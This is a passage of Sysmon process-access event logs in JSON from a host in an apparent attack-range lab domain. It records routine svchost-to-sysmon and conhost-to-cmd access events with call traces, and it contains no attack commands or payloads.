06:49:20.786","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2244,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.786\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.786","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2245,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.786\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.786","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2246,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.786\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.786","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2247,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.786\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.786","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2248,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.786\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.786","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2249,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.786\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.786","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2250,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.786\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.786","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2251,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.786\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-106F-5F25-0000-00106CF10300}\r\nTargetProcessId: 4084\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.786","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-106F-5F25-0000-00106CF10300}","TargetProcessId":"4084","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
